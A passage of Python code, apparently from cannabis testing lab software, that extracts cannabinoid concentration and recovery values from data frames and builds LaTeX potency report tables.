temporary_table = self.create_single_deluxe_table(temporary_data, 'Percent')
header = self.latex_header_and_sample_list_dictionary[sample_id[0:6]]
footer = self.generate_footer()
report = header + temporary_table + footer
self.finished_reports_dictionary[sample_id] = report
def generate_single_mg_g_deluxe_report(self, sample_id):
temporary_data_frame = self.sample_data.samples_data_frame[self.sample_data.samples_data_frame['sampleid']
== sample_id]
temporary_data = self.get_relevant_values_and_recoveries_for_single_reports(temporary_data_frame,
'mg_g',
'Deluxe')
temporary_table = self.create_single_deluxe_table(temporary_data, 'mg_g')
header = self.latex_header_and_sample_list_dictionary[sample_id[0:6]]
footer = self.generate_footer()
report = header + temporary_table + footer
self.finished_reports_dictionary[sample_id] = report
def generate_single_mg_ml_basic_report(self, sample_id):
temporary_data_frame = self.sample_data.samples_data_frame[self.sample_data.samples_data_frame['sampleid']
== sample_id]
temporary_data = self.get_relevant_values_and_recoveries_for_single_reports_unit(temporary_data_frame,
'Basic',
'density')
temporary_table = self.create_single_basic_table_unit(temporary_data, 'density')
header = self.latex_header_and_sample_list_dictionary[sample_id[0:6]]
footer = self.generate_footer()
report = header + temporary_table + footer
self.finished_reports_dictionary[sample_id] = report
def generate_single_mg_ml_deluxe_report(self, sample_id):
temporary_data_frame = self.sample_data.samples_data_frame[self.sample_data.samples_data_frame['sampleid']
== sample_id]
temporary_data = self.get_relevant_values_and_recoveries_for_single_reports_unit(temporary_data_frame,
'Deluxe',
'density')
temporary_table = self.create_single_deluxe_table_unit(temporary_data, 'density')
header = self.latex_header_and_sample_list_dictionary[sample_id[0:6]]
footer = self.generate_footer()
report = header + temporary_table + footer
self.finished_reports_dictionary[sample_id] = report
def generate_single_unit_basic_report(self, sample_id):
temporary_data_frame = self.sample_data.samples_data_frame[self.sample_data.samples_data_frame['sampleid']
== sample_id]
temporary_data = self.get_relevant_values_and_recoveries_for_single_reports_unit(temporary_data_frame,
'Basic',
'unit')
temporary_table = self.create_single_basic_table_unit(temporary_data, 'unit')
header = self.latex_header_and_sample_list_dictionary[sample_id[0:6]]
footer = self.generate_footer()
report = header + temporary_table + footer
self.finished_reports_dictionary[sample_id] = report
def generate_single_unit_deluxe_report(self, sample_id):
temporary_data_frame = self.sample_data.samples_data_frame[self.sample_data.samples_data_frame['sampleid']
== sample_id]
temporary_data = self.get_relevant_values_and_recoveries_for_single_reports_unit(temporary_data_frame,
'Deluxe',
'unit')
temporary_table = self.create_single_deluxe_table_unit(temporary_data, 'unit')
header = self.latex_header_and_sample_list_dictionary[sample_id[0:6]]
footer = self.generate_footer()
report = header + temporary_table + footer
self.finished_reports_dictionary[sample_id] = report
def get_standard_recovery_values(self, report_type):
temporary_data_frame = self.sample_data.best_recovery_qc_data_frame
ibu_recovery_value = temporary_data_frame.loc[temporary_data_frame['id17'] == 1.0,
['percrecovery']].iloc[0]['percrecovery']
ibu_recovery_value = self.round_down_to_correct_decimal_point(ibu_recovery_value)
cbdv_value = temporary_data_frame.loc[temporary_data_frame['id17'] == 2.0,
['percrecovery']].iloc[0]['percrecovery']
cbdv_value = self.round_down_to_correct_decimal_point(cbdv_value)
cbdva_value = temporary_data_frame.loc[temporary_data_frame['id17'] == 3.0,
['percrecovery']].iloc[0]['percrecovery']
cbdva_value = self.round_down_to_correct_decimal_point(cbdva_value)
thcv_value = temporary_data_frame.loc[temporary_data_frame['id17'] == 4.0,
['percrecovery']].iloc[0]['percrecovery']
thcv_value = self.round_down_to_correct_decimal_point(thcv_value)
# cbgva_value = temporary_data_frame.loc[temporary_data_frame['id17'] == 5.0,
# ['percrecovery']].iloc[0]['percrecovery']
# cbgva_value = self.round_down_to_correct_decimal_point(cbgva_value)
cbd_value = temporary_data_frame.loc[temporary_data_frame['id17'] == 6.0,
['percrecovery']].iloc[0]['percrecovery']
cbd_value = self.round_down_to_correct_decimal_point(cbd_value)
cbg_value = temporary_data_frame.loc[temporary_data_frame['id17'] == 7.0,
['percrecovery']].iloc[0]['percrecovery']
cbg_value = self.round_down_to_correct_decimal_point(cbg_value)
cbda_value = temporary_data_frame.loc[temporary_data_frame['id17'] == 8.0,
['percrecovery']].iloc[0]['percrecovery']
cbda_value = self.round_down_to_correct_decimal_point(cbda_value)
cbn_value = temporary_data_frame.loc[temporary_data_frame['id17'] == 9.0,
['percrecovery']].iloc[0]['percrecovery']
cbn_value = self.round_down_to_correct_decimal_point(cbn_value)
cbga_value = temporary_data_frame.loc[temporary_data_frame['id17'] == 10.0,
['percrecovery']].iloc[0]['percrecovery']
cbga_value = self.round_down_to_correct_decimal_point(cbga_value)
thcva_value = temporary_data_frame.loc[temporary_data_frame['id17'] == 11.0,
['percrecovery']].iloc[0]['percrecovery']
thcva_value = self.round_down_to_correct_decimal_point(thcva_value)
d9_thc_value = temporary_data_frame.loc[temporary_data_frame['id17'] == 12.0,
['percrecovery']].iloc[0]['percrecovery']
d9_thc_value = self.round_down_to_correct_decimal_point(d9_thc_value)
d8_thc_value = temporary_data_frame.loc[temporary_data_frame['id17'] == 13.0,
['percrecovery']].iloc[0]['percrecovery']
d8_thc_value = self.round_down_to_correct_decimal_point(d8_thc_value)
cbl_value = temporary_data_frame.loc[temporary_data_frame['id17'] == 14.0,
['percrecovery']].iloc[0]['percrecovery']
cbl_value = self.round_down_to_correct_decimal_point(cbl_value)
cbc_value = temporary_data_frame.loc[temporary_data_frame['id17'] == 15.0,
['percrecovery']].iloc[0]['percrecovery']
cbc_value = self.round_down_to_correct_decimal_point(cbc_value)
cbna_value = temporary_data_frame.loc[temporary_data_frame['id17'] == 16.0,
['percrecovery']].iloc[0]['percrecovery']
cbna_value = self.round_down_to_correct_decimal_point(cbna_value)
thca_value = temporary_data_frame.loc[temporary_data_frame['id17'] == 17.0,
['percrecovery']].iloc[0]['percrecovery']
thca_value = self.round_down_to_correct_decimal_point(thca_value)
cbla_value = temporary_data_frame.loc[temporary_data_frame['id17'] == 18.0,
['percrecovery']].iloc[0]['percrecovery']
cbla_value = self.round_down_to_correct_decimal_point(cbla_value)
cbca_value = temporary_data_frame.loc[temporary_data_frame['id17'] == 19.0,
['percrecovery']].iloc[0]['percrecovery']
cbca_value = self.round_down_to_correct_decimal_point(cbca_value)
if report_type == 'Deluxe':
return [ibu_recovery_value, cbdv_value, cbdva_value, thcv_value, "N/A", cbd_value, cbg_value,
cbda_value, cbn_value, cbga_value, thcva_value, d9_thc_value, d8_thc_value, cbl_value, cbc_value,
cbna_value, thca_value, cbla_value, cbca_value]
else:
return [ibu_recovery_value, cbd_value, cbda_value, cbn_value, cbna_value, d9_thc_value, thca_value,
d8_thc_value]
def get_relevant_values_and_recoveries_for_single_reports(self, temporary_data_frame, sample_type, report_type):
if sample_type == 'Percent':
sample_column_type = 'percentage_concentration'
elif sample_type == 'mg_g':
sample_column_type = 'mg_g'
elif sample_type == 'mg_ml':
sample_column_type = 'mg_ml'
else:
sample_column_type = 'percentage_concentration'
ibu_recovery_value = temporary_data_frame.loc[temporary_data_frame['id17'] == 1.0,
['percrecovery']].iloc[0]['percrecovery']
ibu_recovery_value = self.round_down_to_correct_decimal_point(ibu_recovery_value)
cbdv_value = temporary_data_frame.loc[temporary_data_frame['id17'] == 2.0,
[sample_column_type]].iloc[0][sample_column_type]
cbdv_value = self.round_down_to_correct_decimal_point(cbdv_value)
cbdva_value = temporary_data_frame.loc[temporary_data_frame['id17'] == 3.0,
[sample_column_type]].iloc[0][sample_column_type]
cbdva_value = self.round_down_to_correct_decimal_point(cbdva_value)
thcv_value = temporary_data_frame.loc[temporary_data_frame['id17'] == 4.0,
[sample_column_type]].iloc[0][sample_column_type]
thcv_value = self.round_down_to_correct_decimal_point(thcv_value)
cbgva_value = temporary_data_frame.loc[temporary_data_frame['id17'] == 5.0,
[sample_column_type]].iloc[0][sample_column_type]
cbgva_value = self.round_down_to_correct_decimal_point(cbgva_value)
cbd_value = temporary_data_frame.loc[temporary_data_frame['id17'] == 6.0,
[sample_column_type]].iloc[0][sample_column_type]
cbd_value = self.round_down_to_correct_decimal_point(cbd_value)
cbg_value = temporary_data_frame.loc[temporary_data_frame['id17'] == 7.0,
[sample_column_type]].iloc[0][sample_column_type]
cbg_value = self.round_down_to_correct_decimal_point(cbg_value)
cbda_value = temporary_data_frame.loc[temporary_data_frame['id17'] == 8.0,
[sample_column_type]].iloc[0][sample_column_type]
cbda_value = self.round_down_to_correct_decimal_point(cbda_value)
cbn_value = temporary_data_frame.loc[temporary_data_frame['id17'] == 9.0,
[sample_column_type]].iloc[0][sample_column_type]
cbn_value = self.round_down_to_correct_decimal_point(cbn_value)
cbga_value = temporary_data_frame.loc[temporary_data_frame['id17'] == 10.0,
[sample_column_type]].iloc[0][sample_column_type]
cbga_value = self.round_down_to_correct_decimal_point(cbga_value)
thcva_value = temporary_data_frame.loc[temporary_data_frame['id17'] == 11.0,
[sample_column_type]].iloc[0][sample_column_type]
thcva_value = self.round_down_to_correct_decimal_point(thcva_value)
d9_thc_value = temporary_data_frame.loc[temporary_data_frame['id17'] == 12.0,
[sample_column_type]].iloc[0][sample_column_type]
d9_thc_value = self.round_down_to_correct_decimal_point(d9_thc_value)
d8_thc_value = temporary_data_frame.loc[temporary_data_frame['id17'] == 13.0,
[sample_column_type]].iloc[0][sample_column_type]
d8_thc_value = self.round_down_to_correct_decimal_point(d8_thc_value)
cbl_value = temporary_data_frame.loc[temporary_data_frame['id17'] == 14.0,
[sample_column_type]].iloc[0][sample_column_type]
cbl_value = self.round_down_to_correct_decimal_point(cbl_value)
cbc_value = temporary_data_frame.loc[temporary_data_frame['id17'] == 15.0,
[sample_column_type]].iloc[0][sample_column_type]
cbc_value = self.round_down_to_correct_decimal_point(cbc_value)
cbna_value = temporary_data_frame.loc[temporary_data_frame['id17'] == 16.0,
[sample_column_type]].iloc[0][sample_column_type]
cbna_value = self.round_down_to_correct_decimal_point(cbna_value)
thca_value = temporary_data_frame.loc[temporary_data_frame['id17'] == 17.0,
[sample_column_type]].iloc[0][sample_column_type]
thca_value = self.round_down_to_correct_decimal_point(thca_value)
cbla_value = temporary_data_frame.loc[temporary_data_frame['id17'] == 18.0,
[sample_column_type]].iloc[0][sample_column_type]
cbla_value = self.round_down_to_correct_decimal_point(cbla_value)
cbca_value = temporary_data_frame.loc[temporary_data_frame['id17'] == 19.0,
[sample_column_type]].iloc[0][sample_column_type]
cbca_value = self.round_down_to_correct_decimal_point(cbca_value)
if report_type == 'Deluxe':
return [ibu_recovery_value, cbdv_value, cbdva_value, thcv_value, cbgva_value, cbd_value, cbg_value,
cbda_value, cbn_value, cbga_value, thcva_value, d9_thc_value, d8_thc_value, cbl_value, cbc_value,
cbna_value, thca_value, cbla_value, cbca_value]
else:
return [ibu_recovery_value, cbd_value, cbda_value, cbn_value, cbna_value, d9_thc_value, thca_value,
d8_thc_value]
def get_relevant_values_and_recoveries_for_single_reports_unit(self, temporary_data_frame, report_type, unit_type):
if unit_type == 'unit':
column_1 = 'mg_g'
column_2 = 'mg_unit'
elif unit_type == 'density':
column_1 = 'mg_ml'
column_2 = 'percentage_concentration'
else:
column_1 = 'percentage_concentration'
column_2 = 'percentage_concentration'
ibu_recovery_value = temporary_data_frame.loc[temporary_data_frame['id17'] == 1.0,
['percrecovery']].iloc[0]['percrecovery']
ibu_recovery_value = self.round_down_to_correct_decimal_point(ibu_recovery_value)
cbdv_value = temporary_data_frame.loc[temporary_data_frame['id17'] == 2.0,
[column_1]].iloc[0][column_1]
cbdv_value = self.round_down_to_correct_decimal_point(cbdv_value)
cbdva_value = temporary_data_frame.loc[temporary_data_frame['id17'] == 3.0,
[column_1]].iloc[0][column_1]
cbdva_value = self.round_down_to_correct_decimal_point(cbdva_value)
thcv_value = temporary_data_frame.loc[temporary_data_frame['id17'] == 4.0,
[column_1]].iloc[0][column_1]
thcv_value = self.round_down_to_correct_decimal_point(thcv_value)
cbgva_value = temporary_data_frame.loc[temporary_data_frame['id17'] == 5.0,
[column_1]].iloc[0][column_1]
cbgva_value = self.round_down_to_correct_decimal_point(cbgva_value)
cbd_value = temporary_data_frame.loc[temporary_data_frame['id17'] == 6.0,
[column_1]].iloc[0][column_1]
cbd_value = self.round_down_to_correct_decimal_point(cbd_value)
cbg_value = temporary_data_frame.loc[temporary_data_frame['id17'] == 7.0,
[column_1]].iloc[0][column_1]
cbg_value = self.round_down_to_correct_decimal_point(cbg_value)
cbda_value = temporary_data_frame.loc[temporary_data_frame['id17'] == 8.0,
[column_1]].iloc[0][column_1]
cbda_value = self.round_down_to_correct_decimal_point(cbda_value)
cbn_value = temporary_data_frame.loc[temporary_data_frame['id17'] == 9.0,
[column_1]].iloc[0][column_1]
cbn_value = self.round_down_to_correct_decimal_point(cbn_value)
cbga_value = temporary_data_frame.loc[temporary_data_frame['id17'] == 10.0,
[column_1]].iloc[0][column_1]
cbga_value = self.round_down_to_correct_decimal_point(cbga_value)
thcva_value = temporary_data_frame.loc[temporary_data_frame['id17'] == 11.0,
[column_1]].iloc[0][column_1]
thcva_value = self.round_down_to_correct_decimal_point(thcva_value)
d9_thc_value = temporary_data_frame.loc[temporary_data_frame['id17'] == 12.0,
[column_1]].iloc[0][column_1]
d9_thc_value = self.round_down_to_correct_decimal_point(d9_thc_value)
d8_thc_value = temporary_data_frame.loc[temporary_data_frame['id17'] == 13.0,
[column_1]].iloc[0][column_1]
d8_thc_value = self.round_down_to_correct_decimal_point(d8_thc_value)
cbl_value = temporary_data_frame.loc[temporary_data_frame['id17'] == 14.0,
[column_1]].iloc[0][column_1]
cbl_value = self.round_down_to_correct_decimal_point(cbl_value)
cbc_value = temporary_data_frame.loc[temporary_data_frame['id17'] == 15.0,
[column_1]].iloc[0][column_1]
cbc_value = self.round_down_to_correct_decimal_point(cbc_value)
cbna_value = temporary_data_frame.loc[temporary_data_frame['id17'] == 16.0,
[column_1]].iloc[0][column_1]
cbna_value = self.round_down_to_correct_decimal_point(cbna_value)
thca_value = temporary_data_frame.loc[temporary_data_frame['id17'] == 17.0,
[column_1]].iloc[0][column_1]
thca_value = self.round_down_to_correct_decimal_point(thca_value)
cbla_value = temporary_data_frame.loc[temporary_data_frame['id17'] == 18.0,
[column_1]].iloc[0][column_1]
cbla_value = self.round_down_to_correct_decimal_point(cbla_value)
cbca_value = temporary_data_frame.loc[temporary_data_frame['id17'] == 19.0,
[column_1]].iloc[0][column_1]
cbca_value = self.round_down_to_correct_decimal_point(cbca_value)
# UNITS
cbdv_value_u = temporary_data_frame.loc[temporary_data_frame['id17'] == 2.0,
[column_2]].iloc[0][column_2]
cbdv_value_u = self.round_down_to_correct_decimal_point(cbdv_value_u)
cbdva_value_u = temporary_data_frame.loc[temporary_data_frame['id17'] == 3.0,
[column_2]].iloc[0][column_2]
cbdva_value_u = self.round_down_to_correct_decimal_point(cbdva_value_u)
thcv_value_u = temporary_data_frame.loc[temporary_data_frame['id17'] == 4.0,
[column_2]].iloc[0][column_2]
thcv_value_u = self.round_down_to_correct_decimal_point(thcv_value_u)
cbgva_value_u = temporary_data_frame.loc[temporary_data_frame['id17'] == 5.0,
[column_2]].iloc[0][column_2]
cbgva_value_u = self.round_down_to_correct_decimal_point(cbgva_value_u)
cbd_value_u = temporary_data_frame.loc[temporary_data_frame['id17'] == 6.0,
[column_2]].iloc[0][column_2]
cbd_value_u = self.round_down_to_correct_decimal_point(cbd_value_u)
cbg_value_u = temporary_data_frame.loc[temporary_data_frame['id17'] == 7.0,
[column_2]].iloc[0][column_2]
cbg_value_u = self.round_down_to_correct_decimal_point(cbg_value_u)
cbda_value_u = temporary_data_frame.loc[temporary_data_frame['id17'] == 8.0,
[column_2]].iloc[0][column_2]
cbda_value_u = self.round_down_to_correct_decimal_point(cbda_value_u)
cbn_value_u = temporary_data_frame.loc[temporary_data_frame['id17'] == 9.0,
[column_2]].iloc[0][column_2]
cbn_value_u = self.round_down_to_correct_decimal_point(cbn_value_u)
cbga_value_u = temporary_data_frame.loc[temporary_data_frame['id17'] == 10.0,
[column_2]].iloc[0][column_2]
cbga_value_u = self.round_down_to_correct_decimal_point(cbga_value_u)
thcva_value_u = temporary_data_frame.loc[temporary_data_frame['id17'] == 11.0,
[column_2]].iloc[0][column_2]
thcva_value_u = self.round_down_to_correct_decimal_point(thcva_value_u)
d9_thc_value_u = temporary_data_frame.loc[temporary_data_frame['id17'] == 12.0,
[column_2]].iloc[0][column_2]
d9_thc_value_u = self.round_down_to_correct_decimal_point(d9_thc_value_u)
d8_thc_value_u = temporary_data_frame.loc[temporary_data_frame['id17'] == 13.0,
[column_2]].iloc[0][column_2]
d8_thc_value_u = self.round_down_to_correct_decimal_point(d8_thc_value_u)
cbl_value_u = temporary_data_frame.loc[temporary_data_frame['id17'] == 14.0,
[column_2]].iloc[0][column_2]
cbl_value_u = self.round_down_to_correct_decimal_point(cbl_value_u)
cbc_value_u = temporary_data_frame.loc[temporary_data_frame['id17'] == 15.0,
[column_2]].iloc[0][column_2]
cbc_value_u = self.round_down_to_correct_decimal_point(cbc_value_u)
cbna_value_u = temporary_data_frame.loc[temporary_data_frame['id17'] == 16.0,
[column_2]].iloc[0][column_2]
cbna_value_u = self.round_down_to_correct_decimal_point(cbna_value_u)
thca_value_u = temporary_data_frame.loc[temporary_data_frame['id17'] == 17.0,
[column_2]].iloc[0][column_2]
thca_value_u = self.round_down_to_correct_decimal_point(thca_value_u)
cbla_value_u = temporary_data_frame.loc[temporary_data_frame['id17'] == 18.0,
[column_2]].iloc[0][column_2]
cbla_value_u = self.round_down_to_correct_decimal_point(cbla_value_u)
cbca_value_u = temporary_data_frame.loc[temporary_data_frame['id17'] == 19.0,
[column_2]].iloc[0][column_2]
cbca_value_u = self.round_down_to_correct_decimal_point(cbca_value_u)
if report_type == 'Deluxe':
return [ibu_recovery_value, [cbdv_value, cbdv_value_u], [cbdva_value, cbdva_value_u],
[thcv_value, thcv_value_u], [cbgva_value, cbgva_value_u], [cbd_value, cbd_value_u],
[cbg_value, cbg_value_u], [cbda_value, cbda_value_u], [cbn_value, cbn_value_u],
[cbga_value, cbga_value_u], [thcva_value, thcva_value_u], [d9_thc_value, d9_thc_value_u],
[d8_thc_value, d8_thc_value_u], [cbl_value, cbl_value_u], [cbc_value, cbc_value_u],
[cbna_value, cbna_value_u], [thca_value, thca_value_u], [cbla_value, cbla_value_u],
[cbca_value, cbca_value_u]]
else:
return [ibu_recovery_value, [cbd_value, cbd_value_u], [cbda_value, cbda_value_u], [cbn_value, cbn_value_u],
[cbna_value, cbna_value_u], [d9_thc_value, d9_thc_value_u], [thca_value, thca_value_u],
[d8_thc_value, d8_thc_value_u]]
def create_single_deluxe_table(self, data, sample_type):
thc_total = self.create_total_line('regular', 'deluxe', 'THC', data)
cbd_total = self.create_total_line('regular', 'deluxe', 'CBD', data)
recov_data = self.get_standard_recovery_values('Deluxe')
if sample_type == 'Percent':
sample_type = r'\%'
elif sample_type == 'mg_g':
sample_type = 'mg/g'
elif sample_type == 'mg_ml':
sample_type = 'mg/mL'
else:
sample_type = r'\%'
deluxe_potency_table_string = r"""
\newline
\renewcommand{\arraystretch}{1.2}
\begin{table}[h!]\centering
\begin{tabular}{p{\dimexpr0.270\textwidth-2\tabcolsep-\arrayrulewidth\relax}|
p{\dimexpr0.490\textwidth-2\tabcolsep-\arrayrulewidth\relax}|
p{\dimexpr0.07\textwidth-2\tabcolsep-\arrayrulewidth\relax}
p{\dimexpr0.1\textwidth-2\tabcolsep-\arrayrulewidth\relax}
p{\dimexpr0.07\textwidth-2\tabcolsep-\arrayrulewidth\relax}
}
\textbf{Cannabinoids} & \textbf{Sample 1} & \textbf{\small Blank} & \textbf{\small Recovery} & $\mathbf{\small S_{0}}$\\
& (""" + sample_type + r""") & (\%) & (\%) & (\%) \\
\hline
\hline
$\Delta^{9}$-THC & """ + data[11] + r""" & ND & """ + recov_data[11] + r"""& """ + self.loq_dictionary[11] + r"""\\
$\Delta^{9}$-THC Acid & """ + data[16] + r""" & ND & """ + recov_data[16] + r"""& """ + self.loq_dictionary[16] + r"""\\
\hline
\hline
\textbf{Total THC*} & \textbf{""" + thc_total + r"""} & & &\\
\hline
\hline
$\Delta^{8}$THC & """ + data[12] + r""" & ND & """ + recov_data[12] + r"""& """ + self.loq_dictionary[12] + r"""\\
$\Delta^{8}$THC Acid & ND & ND & N/A & N/A \\
\hline
Cannabichromene (CBC) & """ + data[14] + r""" & ND& """ + recov_data[14] + r"""& """ + self.loq_dictionary[14] + r"""\\
Cannabichromene Acid & """ + data[18] + r""" & ND & """ + recov_data[18] + r"""& """ + self.loq_dictionary[18] + r"""\\
\hline
Cannabidiol (CBD) &""" + data[5] + r""" & ND & """ + recov_data[5] + r"""& """ + self.loq_dictionary[5] + r"""\\
Cannabidiol Acid & """ + data[7] + r""" & ND & """ + recov_data[7] + r"""& """ + self.loq_dictionary[7] + r"""\\
\hline
\hline
\textbf{Total CBD**} & \textbf{""" + cbd_total + r"""} & & &\\
\hline
\hline
Cannabigerol (CBG) & """ + data[6] + r""" & ND & """ + recov_data[6] + r"""& """ + self.loq_dictionary[6] + r"""\\
Cannabigerol Acid & """ + data[9] + r""" & ND & """ + recov_data[9] + r"""& """ + self.loq_dictionary[9] + r"""\\
\hline
Cannabicyclol (CBL) & """ + data[13] + r""" & ND & """ + recov_data[13] + r"""& """ + self.loq_dictionary[13] + r"""\\
Cannabicyclol Acid & """ + data[17] + r""" & ND & """ + recov_data[17] + r"""& """ + self.loq_dictionary[17] + r"""\\
\hline
Cannabidivarin (CBDV) & """ + data[1] + r""" & ND & """ + recov_data[1] + r"""& """ + self.loq_dictionary[1] + r"""\\
Cannabidivarin Acid & """ + data[2] + r""" & ND & """ + recov_data[2] + r"""&""" + self.loq_dictionary[2] + r"""\\
\hline
$\Delta^{9}$ THCV & """ + data[3] + r""" & ND& """ + recov_data[3] + r"""& """ + self.loq_dictionary[3] + r"""\\
$\Delta^{9}$ THCV Acid & """ + data[10] + r""" & ND & """ + recov_data[10] + r"""& """ + self.loq_dictionary[10] + r"""\\
\hline
Cannabinol (CBN) & """ + data[8] + r""" & ND & """ + recov_data[8] + r"""& """ + self.loq_dictionary[8] + r"""\\
Cannabinol Acid & """ + data[15] + r""" & ND & """ + recov_data[15] + r"""& """ + self.loq_dictionary[15] + r""" \\
\hline
Cannabigerivarin Acid & ND & ND & N/A & N/A \\
\hline
\hline
\textbf{Moisture} & 0.00 & & &\\
\hline
\hline
\end{tabular}
\end{table}
"""
return deluxe_potency_table_string
def create_single_deluxe_table_unit(self, data, unit_type):
thc_total = self.create_total_line('unit', 'deluxe', 'THC', data)
cbd_total = self.create_total_line('unit', 'deluxe', 'CBD', data)
recov_data = self.get_standard_recovery_values('Deluxe')
if unit_type == 'unit':
sample_type_1 = 'mg/g'
sample_type_2 = 'mg/unit'
elif unit_type == 'density':
sample_type_1 = 'mg/mL'
sample_type_2 = r'\%'
else:
sample_type_1 = r'\%'
sample_type_2 = r'\%'
deluxe_potency_table_string = r"""
\newline
\renewcommand{\arraystretch}{1.2}
\begin{table}[h!]\centering
\begin{tabular}{p{\dimexpr0.270\textwidth-2\tabcolsep-\arrayrulewidth\relax}|
p{\dimexpr0.245\textwidth-2\tabcolsep-\arrayrulewidth\relax}|
p{\dimexpr0.245\textwidth-2\tabcolsep-\arrayrulewidth\relax}|
p{\dimexpr0.07\textwidth-2\tabcolsep-\arrayrulewidth\relax}
p{\dimexpr0.1\textwidth-2\tabcolsep-\arrayrulewidth\relax}
p{\dimexpr0.07\textwidth-2\tabcolsep-\arrayrulewidth\relax}
}
\textbf{Cannabinoids} & \textbf{Sample 1} & \textbf{Sample 1} & \textbf{\small Blank} & \textbf{\small Recovery} & $\mathbf{\small S_{0}}$ \\
& (""" + sample_type_1 + r""") & (""" + sample_type_2 + r""") & (\%) & (\%) & (\%) \\
\hline
\hline
$\Delta^{9}$-THC & """ + data[11][0] + r""" & """ + data[11][1] + r""" & ND & """ + recov_data[11] + r"""&""" + \
self.loq_dictionary[11] + r"""\\
$\Delta^{9}$-THC Acid & """ + data[16][0] + r""" & """ + data[16][1] + r""" & ND & """ + recov_data[
16] + r"""& """ + self.loq_dictionary[16] + r"""\\
\hline
\hline
\textbf{Total THC*} & \textbf{""" + thc_total[0] + r"""} & \textbf{""" + thc_total[1] + r"""} & & &\\
\hline
\hline
$\Delta^{8}$THC & """ + data[12][0] + r""" & """ + data[12][1] + r""" & ND & """ + recov_data[12] + r"""& """ + \
self.loq_dictionary[12] + r"""\\
$\Delta^{8}$THC Acid & ND & ND & ND & N/A & N/A\\
\hline
Cannabichromene (CBC) & """ + data[14][0] + r""" & """ + data[14][1] + r""" & ND & """ + recov_data[14] + r"""& """ + \
self.loq_dictionary[14] + r"""\\
Cannabichromene Acid & """ + data[18][0] + r""" & """ + data[18][1] + r""" & ND & """ + recov_data[18] + r"""& """ + \
self.loq_dictionary[18] + r"""\\
\hline
Cannabidiol (CBD) &""" + data[5][0] + r""" & """ + data[5][1] + r""" & ND & """ + recov_data[5] + r"""& """ + \
self.loq_dictionary[5] + r"""\\
Cannabidiol Acid & """ + data[7][0] + r""" & """ + data[7][1] + r""" & ND & """ + recov_data[7] + r"""& """ + \
self.loq_dictionary[7] + r"""\\
\hline
\hline
\textbf{Total CBD**} & \textbf{""" + cbd_total[0] + r"""} & \textbf{""" + cbd_total[1] + r"""} & & &\\
\hline
\hline
Cannabigerol (CBG) & """ + data[6][0] + r""" & """ + data[6][1] + r""" & ND & """ + recov_data[6] + r"""& """ + \
self.loq_dictionary[6] + r"""\\
Cannabigerol Acid & """ + data[9][0] + r""" & """ + data[9][1] + r""" & ND & """ + recov_data[9] + r"""& """ + \
self.loq_dictionary[9] + r"""\\
\hline
Cannabicyclol (CBL) & """ + data[13][0] + r""" & """ + data[13][1] + r""" & ND & """ + recov_data[
13] + r"""& """ + self.loq_dictionary[13] + r"""\\
Cannabicyclol Acid & """ + data[17][0] + r""" & """ + data[17][1] + r""" & ND & """ + recov_data[17] + r"""& """ + \
self.loq_dictionary[17] + r"""\\
\hline
Cannabidivarin (CBDV) & """ + data[1][0] + r""" & """ + data[1][1] + r""" & ND & """ + recov_data[1] + r"""& """ + \
self.loq_dictionary[1] + r"""\\
Cannabidivarin Acid & """ + data[2][0] + r""" & """ + data[2][1] + r""" & ND & """ + recov_data[2] + r"""& """ + \
self.loq_dictionary[2] + r"""\\
\hline
$\Delta^{9}$ THCV & """ + data[3][0] + r""" & """ + data[3][1] + r""" & ND & """ + recov_data[3] + r"""& """ + \
self.loq_dictionary[3] + r"""\\
$\Delta^{9}$ THCV Acid & """ + data[10][0] + r""" & """ + data[10][1] + r""" & ND & """ + recov_data[
10] + r"""& """ + self.loq_dictionary[10] + r"""\\
\hline
Cannabinol (CBN) & """ + data[8][0] + r""" & """ + data[8][1] + r""" & ND & """ + recov_data[8] + r"""& """ + \
self.loq_dictionary[8] + r"""\\
Cannabinol Acid & """ + data[15][0] + r""" & """ + data[15][1] + r""" & ND & """ + recov_data[15] + r"""& """ + \
self.loq_dictionary[15] + r""" \\
\hline
Cannabigerivarin Acid & ND & ND & N/A & N/A \\
\hline
\hline
\textbf{Moisture} & 0.00 & & & \\
\hline
\hline
\end{tabular}
\end{table}
"""
return deluxe_potency_table_string
def create_single_basic_table(self, data, sample_type):
thc_total = self.create_total_line('regular', 'basic', 'THC', data)
cbd_total = self.create_total_line('regular', 'basic', 'CBD', data)
recov_data = self.get_standard_recovery_values('Basic')
if sample_type == 'Percent':
sample_type = r'\%'
elif sample_type == 'mg_g':
sample_type = 'mg/g'
elif sample_type == 'mg_ml':
sample_type = 'mg/mL'
else:
sample_type = r'\%'
basic_potency_table_string = r"""
\newline
\renewcommand{\arraystretch}{1.2}
\begin{table}[h!]\centering
\begin{tabular}{p{\dimexpr0.270\textwidth-2\tabcolsep-\arrayrulewidth\relax}|
p{\dimexpr0.490\textwidth-2\tabcolsep-\arrayrulewidth\relax}|
p{\dimexpr0.07\textwidth-2\tabcolsep-\arrayrulewidth\relax}
p{\dimexpr0.1\textwidth-2\tabcolsep-\arrayrulewidth\relax}
p{\dimexpr0.07\textwidth-2\tabcolsep-\arrayrulewidth\relax}
}
\textbf{Cannabinoids} & \textbf{Sample 1} & \textbf{\small Blank} & \textbf{\small Recovery} & $\mathbf{\small S_{0}}$\\
& (""" + sample_type + r""") & (\%) & (\%) & (\%) \\
\hline
\hline
$\Delta^{9}$-THC & """ + data[5] + r""" & ND & """ + recov_data[5] + r"""& """ + self.loq_dictionary[5] + r"""\\
$\Delta^{9}$-THC Acid & """ + data[6] + r""" & ND & """ + recov_data[6] + r"""& """ + self.loq_dictionary[6] + r"""\\
\hline
\hline
\textbf{Total THC*} & \textbf{""" + thc_total + r"""} & & &\\
\hline
\hline
$\Delta^{8}$-THC & """ + data[7] + r""" & ND & """ + recov_data[7] + r"""& """ + self.loq_dictionary[7] + r"""\\
$\Delta^{8}$THC Acid & ND & ND & N/A & N/A \\
\hline
Cannabidiol (CBD) &""" + data[1] + r""" & ND & """ + recov_data[1] + r"""& """ + self.loq_dictionary[1] + r"""\\
Cannabidiol Acid &""" + data[2] + r""" & ND & """ + recov_data[2] + r"""& """ + self.loq_dictionary[2] + r"""\\
\hline
\hline
\textbf{Total CBD**} & \textbf{""" + cbd_total + r"""} & & &\\
\hline
\hline
Cannabinol (CBN) & """ + data[3] + r""" & ND & """ + recov_data[3] + r"""& """ + self.loq_dictionary[3] + r"""\\
Cannabinol Acid & """ + data[4] + r""" & ND & """ + recov_data[4] + r"""& """ + self.loq_dictionary[4] + r"""\\
\hline
\hline
\textbf{Moisture} & 0.00 & & &\\
\hline
\hline
\end{tabular}
\end{table}
"""
return basic_potency_table_string
def create_single_basic_table_unit(self, data, unit_type):
